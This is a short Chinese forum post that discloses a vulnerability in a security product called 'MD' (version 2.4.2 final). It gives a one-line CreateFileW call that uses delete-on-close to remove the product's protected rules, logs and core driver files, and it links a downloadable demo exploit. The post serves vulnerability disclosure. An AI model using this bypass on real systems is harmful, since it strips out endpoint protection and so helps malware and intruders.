昨天爆了一个通用的攻击技巧，其中提到了MD在这个攻击技巧上存在的漏洞，简单举了个可突破其文件保护的漏洞，来作为演示。作者今天早上根据我的帖子做了更新。不过要突破MD的文件保护，根本不需要这么高深的技巧，只需要一行代码就可以了（测试对2.4.2 final有效）

HANDLE hfile = CreateFileW(FilePath,DELETE,FILE_SHARE_READ | FILE_SHARE_WRITE,0,OPEN_EXISTING,   FILE_FLAG_DELETE_ON_CLOSE,0);

FilePath为任意要删除的MD文件，当然被加载和被运行的DLL，EXE不行，可以删除MD的规则、日志和核心驱动文件等。

这里提供一个DEMO程序，可选择任意要删除的MD被保护文件

http://mj0011.ys168.com 漏洞演示下mdvuln.rar